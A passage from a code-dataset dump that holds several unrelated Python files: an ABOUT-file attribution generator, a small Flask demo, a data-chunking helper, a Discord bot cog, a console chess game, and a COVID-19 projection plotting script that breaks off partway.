a subset) of ABOUT file paths to limit the\ngenerated attribution to this subset.\n\"\"\"\n\nfrom __future__ import print_function\n\nfrom about import Collector\nfrom help import MAPPING_HELP\nfrom help import VERBOSITY_HELP\nfrom help import __full_info__\nfrom help import __version_info__\nfrom os.path import abspath\nfrom os.path import basename\nfrom os.path import dirname\nfrom os.path import exists\nfrom os.path import expanduser\nfrom os.path import isdir\nfrom os.path import join\nfrom os.path import normpath\nfrom util import ImprovedFormatter\nfrom util import apply_mappings\nfrom util import extract_zip\n\nimport csv\nimport errno\nimport logging\nimport optparse\nimport os\nimport posixpath\nimport sys\n\n\nLOG_FILENAME = 'error.log'\n\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.CRITICAL)\nhandler.setFormatter(logging.Formatter('%(levelname)s: %(message)s'))\nlogger.addHandler(handler)\nfile_logger = logging.getLogger(__name__ + '_file')\n\ndef get_about_file_paths(abouts):\n    \"\"\"\n    Return a list of about_file paths given a list of About data dictionaries.\n    \"\"\"\n    return [row['about_file'] for row in abouts if 'about_file' in row]\n\n\ndef as_about_paths(paths):\n    \"\"\"\n    Given a list of paths, return a list of paths that all point to .ABOUT files.\n    \"\"\"\n    normalized_paths = []\n    for path in paths:\n        if path.endswith('.ABOUT'):\n            normalized_paths.append(path)\n        else:\n            if path.endswith('/'):\n                path += basename(dirname(path))\n            normalized_paths.append(path + '.ABOUT')\n    return normalized_paths\n\n\ndef lower_keys(dicts):\n    \"\"\"\n    Return a new list of 'dicts' dictionaries such that all the keys are\n    lowercased.\n    \"\"\"\n    lowered_dicts = []\n    for dct in dicts:\n        lowered = {}\n        for key, value in dct.items():\n            lowered[key.lower()] = value\n        lowered_dicts.append(lowered)\n    return lowered_dicts\n\n\ndef has_about_file_keys(abouts):\n    \"\"\"\n    Return True if all dicts in a list of About dictionaries have an about_file key.\n    \"\"\"\n    return all(about.get('about_file') for about in abouts)\n\n\ndef normalize_about_file_paths(abouts):\n    \"\"\"\n    Update a list of About data dictionaries such that all 'about_file' paths are\n    absolute POSIX paths (i.e. prefixed with a POSIX / \"slash\").\n    \"\"\"\n    for about in abouts:\n        about_file_path = about.get('about_file')\n        if about_file_path and not about_file_path.startswith(posixpath.sep):\n            about['about_file'] = '/' + about_file_path\n    return abouts\n\n\nUSAGE_SYNTAX = \"\"\"\\\n<input_path> can be a file or directory containing ABOUT files.\n<output_path> is a file path to save the rendered attribution (e.g. 
.html).\n<component_list> is an optional .csv file with at least an \"about_file\" column to limit attribution generation to that list.\n\"\"\"\n\n\nTEMPLATE_LOCATION_HELP = \"\"\"\\\nOptional path to a custom template to use for generating the attribution.\nDefaults to 'about_code_tool/templates/default.html'\n\"\"\"\n\nVERIFICATION_HELP = \"\"\"\\\nOptional path to a verification CSV file created from the generated attribution.\n\"\"\"\n\ndef main(parser, options, args):\n    overwrite = options.overwrite\n    verbosity = options.verbosity\n    mapping_config = options.mapping\n    template_location = options.template_location\n    verification_location = options.verification_location\n\n    if options.version:\n        print(__full_info__)\n        sys.exit(0)\n\n    if verbosity == 1:\n        handler.setLevel(logging.ERROR)\n    elif verbosity >= 2:\n        handler.setLevel(logging.WARNING)\n\n    if mapping_config:\n        if not exists('MAPPING.CONFIG'):\n            print(\"ERROR: The 'MAPPING.CONFIG' file does not exist.\")\n            sys.exit(errno.EINVAL)\n\n    if template_location:\n        template_location = abspath(expanduser(template_location))\n        if not exists(template_location):\n            print('ERROR: The TEMPLATE_LOCATION file does not exist.')\n            parser.print_help()\n            sys.exit(errno.EINVAL)\n\n    if verification_location:\n        verification_location = abspath(expanduser(verification_location))\n        if not verification_location.endswith('.csv'):\n            print('ERROR: The VERIFICATION_LOCATION file path must end with \".csv\".')\n            parser.print_help()\n            sys.exit(errno.EINVAL)\n        if not exists(dirname(verification_location)):\n            print('ERROR: The VERIFICATION_LOCATION file parent directory does not exist.')\n            parser.print_help()\n            sys.exit(errno.EINVAL)\n\n    if not len(args) >= 2 or not len(args) < 4:\n        print('ERROR: The number of arguments is incorrect.')\n        parser.print_help()\n        sys.exit(errno.EEXIST)\n\n    input_path = args[0]\n    output_path = args[1]\n    if len(args) == 3:\n        component_subset_path = args[2]\n    else:\n        component_subset_path = \"\"\n\n    # TODO: need more path normalization (normpath, expanduser)\n    input_path = expanduser(normpath(input_path))\n    output_path = expanduser(normpath(output_path))\n\n    # Add the following to solve the\n    # UnicodeEncodeError: 'ascii' codec can't encode character\n    # FIXME: these two lines do not make sense\n    reload(sys)\n    sys.setdefaultencoding('utf-8')  # @UndefinedVariable\n\n    if not exists(input_path):\n        print('ERROR: <input_path> does not exist.')\n        parser.print_help()\n        sys.exit(errno.EEXIST)\n\n    if input_path.lower().endswith('.zip'):\n        # accept zipped ABOUT files as input\n        input_path = extract_zip(input_path)\n\n    if isdir(output_path):\n        print('ERROR: <output_path> must be an HTML file, not a directory')\n        parser.print_help()\n        sys.exit(errno.EISDIR)\n\n    # We only support HTML currently\n    if not output_path.endswith('.html'):\n        print('ERROR: <output_path> must be an HTML file.')\n        parser.print_help()\n        sys.exit(errno.EINVAL)\n\n    if exists(output_path) and not overwrite:\n        print('ERROR: A file at <output_path> already exists. 
Select a different file name or use the --overwrite option.')\n        parser.print_help()\n        sys.exit(errno.EEXIST)\n\n    if component_subset_path and not exists(component_subset_path):\n        print('ERROR: the <component_list> CSV file does not exist.')\n        parser.print_help()\n        sys.exit(errno.EEXIST)\n\n    if not exists(output_path) or (exists(output_path) and overwrite):\n        collector = Collector(input_path)\n        outlist = None\n        if not component_subset_path:\n            sublist = None\n\n        else:\n            with open(component_subset_path, 'rU') as inp:\n                reader = csv.DictReader(inp)\n                abouts = [data for data in reader]\n\n            abouts = lower_keys(abouts)\n\n            if mapping_config:\n                abouts = apply_mappings(abouts)\n\n            if not has_about_file_keys(abouts):\n                print('ERROR: The required column key \"about_file\" was not found in the CSV file.')\n                print('Please use the \"--mapping\" option to map the input keys and verify the mapping information is correct.')\n                print('OR, correct the header keys from the component list.')\n                parser.print_help()\n                sys.exit(errno.EISDIR)\n\n            abouts = normalize_about_file_paths(abouts)\n\n            sublist = get_about_file_paths(abouts)\n            outlist = as_about_paths(sublist)\n\n        attrib_str = collector.generate_attribution(template_path=template_location, limit_to=outlist, verification=verification_location)\n        errors = collector.get_genattrib_errors()\n\n        if attrib_str:\n            try:\n                with open(output_path, 'w') as f:\n                    f.write(attrib_str)\n            except Exception as e:\n                print('An error occurred. Attribution was not generated.')\n                print(e)\n\n        print('Completed.')\n        # Remove the previous log file if it exists\n        log_path = join(dirname(output_path), LOG_FILENAME)\n        if exists(log_path):\n            os.remove(log_path)\n\n        file_handler = logging.FileHandler(log_path)\n        file_logger.addHandler(file_handler)\n        for error_msg in errors:\n            logger.error(error_msg)\n            file_logger.error(error_msg)\n        if errors:\n            print('%d errors detected.' 
% len(errors))\n\n    else:\n        # we should never reach this\n        assert False, 'Unsupported option(s).'\n\n\ndef get_parser():\n    \"\"\"\n    Return a command line options parser.\n    \"\"\"\n    parser = optparse.OptionParser(\n        usage='%prog [options] input_path output_path [component_list]',\n        description=USAGE_SYNTAX,\n        add_help_option=False,\n        formatter=ImprovedFormatter(),\n    )\n    parser.add_option('-h', '--help', action='help', help='Print this help message and exit.')\n    parser.add_option('--version', action='store_true', help='Print the current version and copyright notice and exit')\n    parser.add_option('--overwrite', action='store_true', help='Overwrites the <output_path> file if it exists.')\n    parser.add_option('--verbosity', type=int, help=VERBOSITY_HELP)\n    parser.add_option('--template_location', type='string', help=TEMPLATE_LOCATION_HELP)\n    parser.add_option('--mapping', action='store_true', help=MAPPING_HELP)\n    parser.add_option('--verification_location', type='string', help=VERIFICATION_HELP)\n    return parser\n\n\nif __name__ == '__main__':\n    print(__version_info__)\n    parser = get_parser()\n    options, args = parser.parse_args()\n    main(parser, options, args)\n","sub_path":"about_code_tool/genattrib.py","file_name":"genattrib.py","file_ext":"py","file_size_in_byte":10563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"29677116","text":"import time\n\nimport gevent\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\napp.config.update(dict(\n    DEBUG=True,\n    SECRET_KEY=('\\xb73?\\xb5\\x83j\\xf7W\\xc1?\\x8f\\xe7'\n                '\\xbb\\xa3\\xaf0\\x9d\\x90\\x00l\\xc5\\xe1CM')\n))\n\n\n@app.route(\"/callback\", methods=['POST'])\ndef receiver():\n    context = request.get_json()\n    print(context)\n    return jsonify({\"response\": \"OK!\"})\n\n\n@app.route('/block')\ndef block_view():\n    time.sleep(0.1)\n    print('block view processing finish')\n    return jsonify({\"content\": \"block view ok\"})\n\n\n@app.route('/normal')\ndef normal_view():\n    print('normal view processing finish')\n    return jsonify({\"content\": \"normal view ok %s \" % time.time()})\n","sub_path":"run-python-web-app/flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"51936714","text":"#!/usr/bin/python3\nimport sys\n\ndef splitdata(data, target, controller):\n    arr = []\n    dsize = 10976\n    bst = ''.join(format(ord(x), 'b') for x in data)\n\n    # emit fixed-size chunks of the encoded payload, each prefixed with\n    # the target and controller ids\n    while len(bst) > dsize:\n        arr.append('{0}{1}{2}'.format(target, controller, bst[:dsize]))\n        bst = bst[dsize:]\n\n    # whatever remains becomes the final chunk\n    arr.append('{0}{1}{2}'.format(target, controller, bst))\n\n    return arr\n","sub_path":"Python_scripts/decentralized_vpn/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"133209940","text":"import discord\r\nfrom discord.ext import commands\r\nimport datetime\r\n\r\nclass Info(commands.Cog):\r\n    def __init__(self, bot):\r\n        self.bot = bot\r\n\r\n    @commands.command(brief=\"provides info about user\")#userinfo embed\r\n    async def userinfo(self, ctx, *user):\r\n        if(len(ctx.message.mentions)>0):\r\n            for user in ctx.message.mentions:\r\n                member = user\r\n        else: member = ctx.message.author\r\n        if member.activity is None: description=\" \"\r\n        elif member.activity.type == discord.ActivityType.playing: description=f\"Playing 
{member.activity.name}\"\r\n        elif member.activity.type == discord.ActivityType.streaming: description=f\"Streaming at {member.activity.url}\"\r\n        elif member.activity.type == discord.ActivityType.listening:\r\n            song = member.activities[0].title\r\n            description=f\"Listening to {song}\"\r\n        else: description=\" \"\r\n        membercolour = member.colour\r\n        embed = discord.Embed(title=f\"{str(member)}\",\r\n                              description=description,\r\n                              colour=membercolour\r\n                              )\r\n        embed.add_field(name=\"Account created on\",\r\n                        value=member.created_at.strftime(\"%Y-%m-%d %H:%M\"),\r\n                        inline=True)\r\n        embed.add_field(name=\"Joined this server on\",\r\n                        value=member.joined_at.strftime(\"%Y-%m-%d %H:%M\"),\r\n                        inline=True)\r\n        embed.set_image(url=member.avatar_url)\r\n        await ctx.send(embed=embed)\r\n\r\n    def emojifielder(self, amount,emojis, embed):\r\n        for i in range(amount):\r\n            embed.add_field(name=f\":{emojis[i].name}:\",\r\n                            value=f\"{emojis[i]}\")\r\n\r\n    @commands.command(brief=\"lists emojis of server\")\r\n    async def emojis(self, ctx):\r\n        emojis = ctx.message.guild.emojis\r\n        embed = discord.Embed(title=\"All emojis in this server:\",\r\n                              description=f\"({len(emojis)})\",\r\n                              colour=0x35a1bb\r\n                              )\r\n        self.emojifielder(len(emojis), emojis, embed)\r\n        await ctx.send(embed=embed)\r\n\r\n    @commands.command(brief=\"shows profile picture\")#avatar\r\n    async def avatar(self, ctx, *user):\r\n        if(len(ctx.message.mentions)>0):\r\n            for user in ctx.message.mentions:\r\n                member = user\r\n        else: member = ctx.message.author\r\n        await ctx.send(member.avatar_url)\r\n\r\n    @commands.command(brief=\"invite link\")\r\n    async def invite(self, ctx):\r\n        await ctx.send(\"https://discordapp.com/oauth2/authorize?client_id=348563424545865728&scope=bot&permissions=1610050807\")\r\n\r\n    @commands.command(brief=\"info about an Albert Heijn product\")\r\n    async def albertheijn(self, ctx):\r\n        await ctx.send(\"this one doesn't work because I'm lazy\")\r\n    \r\ndef setup(bot):\r\n    bot.add_cog(Info(bot))\r\n","sub_path":"SUOP/modules/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"66244034","text":"team = [\",\",\"w\",\"b\"]\nsymbol = [\" \", \"1\", \"B\", \"N\", \"R\", \"Q\", \"K\"]#[\")\",\"S\",\"c\",\"C\"]\n\ndef printBoard(board,board2):\n    y = -1\n    for x in range (25):\n        a = \" \"\n        if x % 3 == 0:\n            print(\" +-----+-----+-----+-----+-----+-----+-----+-----+\")\n        elif (x-1) % 3 == 0:\n            y += 1\n            print(\" | \",symbol[board[y][0]],\" | \",symbol[board[y][1]],\n                  \" | \",symbol[board[y][2]],\" | \",symbol[board[y][3]],\n                  \" | \",symbol[board[y][4]],\" | \",symbol[board[y][5]],\n                  \" | \",symbol[board[y][6]],\" | \",symbol[board[y][7]],\" |\")\n        else:\n            print(\" |\", team[board2[y][0]],\" |\",team[board2[y][1]],\n                  \" |\",team[board2[y][2]],\" |\",team[board2[y][3]],\n                  \" |\",team[board2[y][4]],\" |\",team[board2[y][5]],\n                  \" |\",team[board2[y][6]],\" |\",team[board2[y][7]],\" |\")\n    pass\n\ndef markBoard(board,board2,row,col,piece,player):\n    if board2[row][col] != player:\n        board2[row][col] = player\n        board[row][col] = piece\n    else:\n        print(\"space is already occupied.\")\n    pass\n\ndef getPlayerMove(board,board2,player):\n    while True:\n        pr=int(input(\"pieces row\"))\n        pc=int(input(\"pieces column\"))\n        if board2[pr][pc] != player:\n            print(\"you cannot use that piece!\")\n        else: \n            p = board[pr][pc]\n            break\n    # board2 holds piece ownership, which validspace() inspects\n    moves = lglmvs(p, pr, pc, player, board2)\n    while True:\n        try:\n            r=int(input(\"new row\"))\n            c=int(input(\"new column\"))\n            newloc = (r, 
c)\n            if newloc in moves:\n                board[pr][pc] = 0\n                board2[pr][pc] = 0\n                return (r,c, p)\n        except:\n            print (\"invalid!\")\n\ndef hasKings(board):\n    m = 0\n    for row in board:\n        for space in row:\n            if space == 6:\n                m = m + 1\n    if m == 2:\n        return True\n    else:\n        return False\n\ndef lglmvs(piece, cx, cy, player, team):\n    moves=[\"cancel\"]\n    print (cx,cy)\n    if piece == 1:\n        moves = Pawn(cx, cy, moves, team, player)\n    elif piece == 2:\n        moves = Bishop(cx, cy, moves, team, player)\n    elif piece == 3:\n        moves = Knight(cx, cy, moves, team, player)\n    elif piece == 4:\n        moves = Rook(cx, cy, moves, team, player)\n    elif piece == 5:\n        # the queen combines the rook and bishop moves\n        moves = Rook(cx, cy, moves, team, player)\n        moves = Bishop(cx, cy, moves, team, player)\n    elif piece == 6:\n        moves = King(cx, cy, moves, team, player)\n    return moves\n\ndef Pawn (cx, cy, moves, team, player):\n    # pawns advance toward the opposite side; captures are diagonal\n    i = (-1)**int(player)\n    if validspace(cx+i, cy+1, team, player) == \"Enemy\":\n        moves.append((cx+i, cy+1))\n    if validspace(cx+i, cy-1, team, player) == \"Enemy\":\n        moves.append((cx+i, cy-1))\n    if validspace(cx+i, cy, team, player) == True:\n        moves.append((cx+i, cy))\n    return moves\n\ndef King (cx, cy, moves, team, player):\n    # one step in any of the eight directions\n    for dx in (-1, 0, 1):\n        for dy in (-1, 0, 1):\n            if dx == 0 and dy == 0:\n                continue\n            space = validspace(cx+dx, cy+dy, team, player)\n            if space == \"Enemy\" or space == True:\n                moves.append((cx+dx, cy+dy))\n    # drop destinations that an enemy piece could capture\n    for (nx, ny) in list(moves[1:]):\n        if checktest(cx, cy, nx, ny, team) == True:\n            moves.remove((nx, ny))\n    return moves\n\ndef Knight (cx, cy, moves, team, player):\n    for (dx, dy) in ((1,2),(-1,2),(1,-2),(-1,-2),(2,1),(-2,1),(2,-1),(-2,-1)):\n        space = validspace(cx+dx, cy+dy, team, player)\n        if space == \"Enemy\" or space == True:\n            moves.append((cx+dx, cy+dy))\n    return moves\n\ndef Bishop (cx, cy, moves, team, player):\n    # walk each diagonal outward until a piece or the board edge blocks the way\n    for (dx, dy) in ((1,1),(1,-1),(-1,1),(-1,-1)):\n        for i in range (1, 8):\n            space = validspace(cx+dx*i, cy+dy*i, team, player)\n            if space == \"Enemy\":\n                moves.append((cx+dx*i, cy+dy*i))\n                break\n            elif space == True:\n                moves.append((cx+dx*i, cy+dy*i))\n            else:\n                break\n    return moves\n\ndef Rook(cx,cy, moves, team, player):\n    # walk each rank and file outward until a piece or the board edge blocks the way\n    for (dx, dy) in ((1,0),(-1,0),(0,1),(0,-1)):\n        for i in range (1, 8):\n            space = validspace(cx+dx*i, cy+dy*i, team, player)\n            if space == \"Enemy\":\n                moves.append((cx+dx*i, cy+dy*i))\n                break\n            elif space == True:\n                moves.append((cx+dx*i, cy+dy*i))\n            else:\n                break\n    return moves\n\ndef validspace(nx, ny, team, player):\n    if nx < 0 or nx > 7 or ny < 0 or ny > 7:\n        return False\n    elif team[nx][ny] == 0:\n        return True\n    elif team[nx][ny] == player:\n        return False\n    elif team[nx][ny] != player:\n        return \"Enemy\"\n\ndef checktest(cx, cy, nx, ny, team):\n    # simplified check test: scanning enemy moves would need the piece board,\n    # which is not available here, so every square is treated as safe\n    return False\n\ndef main():\n    board = [[4,3,2,5,6,2,3,4],\n             [1,1,1,1,1,1,1,1],\n             [0,0,0,0,0,0,0,0],\n             [0,0,0,0,0,0,0,0],\n             [0,0,0,0,0,0,0,0],\n             [0,0,0,0,0,0,0,0],\n             [1,1,1,1,1,1,1,1],\n             [4,3,2,5,6,2,3,4]]\n    \n    board2 = [[2,2,2,2,2,2,2,2],\n              [2,2,2,2,2,2,2,2],\n              [0,0,0,0,0,0,0,0],\n              [0,0,0,0,0,0,0,0],\n              [0,0,0,0,0,0,0,0],\n              [0,0,0,0,0,0,0,0],\n              [1,1,1,1,1,1,1,1],\n              [1,1,1,1,1,1,1,1]]\n    player = 1\n    while hasKings(board):\n        printBoard(board,board2)\n        row,col,piece = getPlayerMove(board,board2,player)\n        markBoard(board,board2,row,col,piece,player)\n        player = player % 2 + 1 \n    printBoard(board,board2)\n    player = player % 2 + 1\n    print (\"player \"+str(player)+\" wins!\")\nmain()\n\n##############################################################################\n\n#card table (future)\n    #GhostForm\n    #Wololo\n    #Charge\n    #RoyalMarriage\n    #Resurection\n    #Archery\n    #Knighting\n    #Draft\n    #Faith\n    #Rookerie\n    #SummonDragon\n    #Teleport\n    #Chivalry\n    \n\n\n\n","sub_path":"chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":8934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"638475266","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nimport matplotlib.dates as mdates\nimport datetime\nimport os\nimport seaborn as sns\nimport codes.utils as cutil\n\n# save the figure here\nsave_fig = True\nfig_dir = cutil.HOME / 'results' / 'figures' / 'fig4'\nfig_dir.mkdir(parents=True, exist_ok=True)\nfig_name = 'fig4.pdf'\n\n# for nice exporting to illustrator\nmatplotlib.rcParams['pdf.fonttype'] = 42\n\n# figure aesthetics\nno_policy_color = 'red'\npolicy_color = 'blue'\nmatplotlib.rcParams['font.sans-serif'] = 
\"Arial\"\nmatplotlib.rcParams['font.family'] = \"sans-serif\"\n\n# column indices for prediction data\npred_no_pol_key = 'predicted_cum_confirmed_cases_no_policy'\npred_pol_key = 'predicted_cum_confirmed_cases_true'\n\ndata_dir = cutil.DATA / 'post_processing'\nfn_template = os.path.join(data_dir,'{0}_bootstrap_projection.csv')\n\ncountries_in_order = ['china','korea', 'italy', 'iran', 'france', 'usa']\n\ncountry_names = {\n 'france':'France', 'iran':\"Iran\",'usa':\"United States\", 'italy': \"Italy\", 'china':'China', 'korea':'South Korea'\n \n}\n\n\ndef color_add_alpha(color,alpha):\n color_rgba = list(matplotlib.colors.to_rgba(color))\n color_rgba[3] = alpha\n return color_rgba\n\n\ndef plot_quantiles(ax, quantiles, quantiles_dict, legend_dict, model, update_legend):\n if ax is None:\n fig, ax = plt.subplots(figsize=(10,10))\n\n dates = quantiles_dict['dates']\n \n quantiles_no_policy = quantiles_dict['quantiles_no_policy']\n quantiles_policy = quantiles_dict['quantiles_policy']\n \n if not model is None:\n dates_model = pd.to_datetime(model['date'])\n preds_policy = model['predicted_cum_confirmed_cases_true']\n preds_no_policy = model['predicted_cum_confirmed_cases_no_policy']\n\n num_ranges = int(len(quantiles)/2)\n\n upper_idx = -1\n lower_idx = 0\n \n # inner to outer - hardcode for now\n alphas_fc = [0.2,.5]\n alphas_ec = [0.4,.9]\n \n if not model is None:\n model_no_pol = ax.plot(dates_model, preds_no_policy, color=no_policy_color,\n lw=5, ls='--')\n \n if update_legend:\n legend_dict['lines'].append(model_no_pol[0])\n legend_dict['labels'].append('\"No policy\" scenario')\n\n for i in range(num_ranges):\n if i >= 0:\n l_no_pol = ax.fill_between(pd.to_datetime(dates), \n quantiles_no_policy[:,lower_idx], \n quantiles_no_policy[:,upper_idx], \n facecolor=color_add_alpha(no_policy_color, alphas_fc[i]),\n # edgecolor=color_add_alpha(no_policy_color, alphas_ec[i]),\n # alpha = alphas_fc[i],\n )\n \n if update_legend:\n legend_dict['lines'].append(l_no_pol)\n legend_dict['labels'].append('{0}% interval'.format(\n int(100*(quantiles[upper_idx]- quantiles[lower_idx]))))\n \n lower_idx += 1\n upper_idx -= 1\n \n \n if not model is None:\n model_pol = ax.plot(dates_model, preds_policy, color=policy_color,\n lw=5, ls='--')\n\n if update_legend:\n legend_dict['lines'].append(model_pol[0])\n legend_dict['labels'].append('Actual policies (predicted)')\n \n \n # reset \n upper_idx = -1\n lower_idx = 0\n \n for i in range(num_ranges):\n if i >= 0: \n l_pol = ax.fill_between(pd.to_datetime(dates), \n quantiles_policy[:,lower_idx], \n quantiles_policy[:,upper_idx], \n facecolor=color_add_alpha(policy_color, alphas_fc[i]),\n # edgecolor=color_add_alpha(policy_color, alphas_ec[i]),\n )\n \n \n if update_legend:\n legend_dict['lines'].append(l_pol)\n legend_dict['labels'].append('{0}% interval'.format(\n int(100*(quantiles[upper_idx]- quantiles[lower_idx]))))\n \n \n lower_idx += 1\n upper_idx -= 1\n \n \n return ax\n \ndef plot_cases(ax, this_country_cases, legend_dict, update_legend):\n if ax is None:\n fig, ax = plt.subplots()\n \n dates_cases = pd.to_datetime(this_country_cases['date'])\n cases = this_country_cases['cases'].values\n \n case_scatter = ax.scatter(dates_cases.values,cases, marker='o', color='black', s=36,clip_on=False)\n if update_legend:\n legend_dict['lines'].append(case_scatter)\n legend_dict['labels'].append('Cumulative observed cases')\n\n return ax\n\ndef plot_model(ax, this_country_model, legend_dict, update_legend):\n if ax is None:\n fig, ax = plt.subplots()\n \n dates = 
pd.to_datetime(this_country_model['date'])\n preds_policy = this_country_model['predicted_cum_confirmed_cases_true']\n preds_no_policy = this_country_model['predicted_cum_confirmed_cases_no_policy']\n \n l_pol = ax.plot(dates, preds_policy, color=policy_color,\n lw=3, ls='--')\n \n l_no_pol = ax.plot(dates, preds_no_policy, color=no_policy_color,\n lw=3, ls='--')\n \n if update_legend:\n legend_dict['lines'].append(l_pol)\n legend_dict['lines'].append(l_no_pol)\n \n legend_dict['labels'].append('Prediction with policy')\n legend_dict['labels'].append('Prediction no policy')\n \n return ax\n \ndef make_quantiles(this_country_df, quantiles):\n df_by_date = this_country_df.groupby('date')\n quantiles_array_policy = np.zeros((len(df_by_date.groups.keys()), len(quantiles)))\n quantiles_array_no_policy = np.zeros((len(df_by_date.groups.keys()), len(quantiles)))\n\n for d,date_idx in enumerate(df_by_date.groups.keys()):\n this_day = df_by_date.get_group(date_idx)\n \n for q,quantile in enumerate(quantiles):\n quantiles_array_policy[d,q] = np.quantile(this_day['predicted_cum_confirmed_cases_true'],\n quantile)\n quantiles_array_no_policy[d,q] = np.quantile(this_day['predicted_cum_confirmed_cases_no_policy'],\n quantile)\n \n dates = pd.to_datetime(list(df_by_date.groups.keys()))\n\n return dates, quantiles_array_policy, quantiles_array_no_policy\n\n\ndef plot_bracket(ax, model_df):\n # most recent case\n last_model_day = model_df['date'].max()\n \n start = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=1.5)), \n model_df.loc[model_df['date'] ==last_model_day,pred_pol_key].values[0])\n \n start_cap = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=1)), \n model_df.loc[model_df['date'] ==last_model_day,pred_pol_key].values[0])\n \n end = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=1.5)), \n model_df.loc[model_df['date'] ==last_model_day,pred_no_pol_key].values[0])\n \n end_cap = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=1)), \n model_df.loc[model_df['date'] ==last_model_day,pred_no_pol_key].values[0])\n\n # geometric mean is middle b/c log space\n text_spot_start = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=1.5)), \n np.sqrt(start[1]*end[1]))\n text_spot_end = (mdates.date2num(pd.to_datetime(last_model_day)+datetime.timedelta(days=3)), \n np.sqrt(start[1]*end[1]))\n \n \n # put line\n ax.arrow(start[0],start[1], 0, end[1] - start[1], lw=2, clip_on=False)\n # put caps\n ax.arrow(start_cap[0],start_cap[1], start[0] - start_cap[0], 0, lw=2, clip_on=False)\n ax.arrow(end_cap[0],end_cap[1], end[0] - end_cap[0], 0, lw=2, clip_on=False)\n \n # rounds to the nearest 1,000\n num_rounded = int(round(end[1]-start[1],-3))\n annot = \"{0:,d} fewer\\nestimated cases\".format(num_rounded)\n # put text\n ax.annotate(annot, xy=text_spot_start, xytext=text_spot_end, annotation_clip=False, fontsize=30,\n va='center')\n \ndef annotate_cases(ax, cases):\n # get most recent case\n lastest_cases_date = cases['date'].max()\n \n cases_last = cases[cases['date'] ==lastest_cases_date]['cases'].values[0]\n cases_date = pd.to_datetime(lastest_cases_date)\n \n cases_pos = (mdates.date2num(cases_date), cases_last)\n \n # divide for even spacing in log scale\n text_pos = (mdates.date2num(cases_date + datetime.timedelta(days=2)), cases_last/100. 
)\n\n formatter = mdates.DateFormatter(\"%b %d\")\n annot_date = cases_date.strftime(\"%b %d\")\n \n annot = \"{0}: {1:,d} \\nconfirmed cases\".format(annot_date, int(cases_last))\n ax.annotate(annot, xy=cases_pos, xytext=text_pos, annotation_clip=False, fontsize=30,\n va='center', arrowprops={'arrowstyle':\"->\", \n 'shrinkA':10,'shrinkB':10, \n 'connectionstyle':\"arc3,rad=0.3\",\n 'color':'black',\n 'lw':1.5})\n \n \ndef main():\n # read in all the cases data\n cases_dict = cutil.load_all_cases_deaths(cases_drop=True)\n \n # get resampled data\n resampled_dfs_by_country = {}\n for country in countries_in_order:\n print('reading ', fn_template.format(country))\n resampled_dfs_by_country[country] = pd.read_csv(fn_template.format(country))\n\n # get central estimates\n model_dfs_by_country = {}\n for country in countries_in_order:\n model_dfs_by_country[country] = pd.read_csv(fn_template.replace('bootstrap','model').format(country))\n\n\n # get quantile data\n quantiles = [0.025, # 95% range\n 0.15, # 70% range\n 0.85, \n 0.975]\n\n quantiles_by_country = {}\n for country in countries_in_order:\n quantile_this_country = {}\n dates, quantiles_policy, quantiles_no_policy = make_quantiles(resampled_dfs_by_country[country], quantiles)\n\n quantile_this_country['dates'] = dates\n quantile_this_country['quantiles_policy'] = quantiles_policy\n quantile_this_country['quantiles_no_policy'] = quantiles_no_policy\n quantiles_by_country[country] = quantile_this_country\n \n \n # plot \n fig, ax = plt.subplots(len(countries_in_order), figsize=(15,7*len(countries_in_order)),\n sharex=True, \n sharey=True\n )\n\n legend_dict = {'lines':[], 'labels':[]}\n \n for c, country in enumerate(countries_in_order):\n # 1.a plot quantiles and model\n quantiles_this_country = quantiles_by_country[country]\n model_this_country = model_dfs_by_country[country]\n\n ax[c] = plot_quantiles(ax[c], quantiles, quantiles_this_country, legend_dict,\n model=model_this_country,\n update_legend = (c==0))\n\n\n # 1.b annotate the model on the right\n plot_bracket(ax[c], model_this_country)\n\n # 2.a plot cases where they overlap with predictions\n cases_this_country = cases_dict[country]\n cases_overlap_preds_mask = cases_this_country['date_str'].apply(lambda x: \n x in model_this_country['date'].values)\n cases_overlapping_predictions = cases_this_country.where(cases_overlap_preds_mask)\n ax[c] = plot_cases(ax[c],cases_overlapping_predictions, legend_dict, update_legend = (c==0))\n \n # 2.b annotate cases\n annotate_cases(ax[c], cases_overlapping_predictions)\n\n\n # 3. 
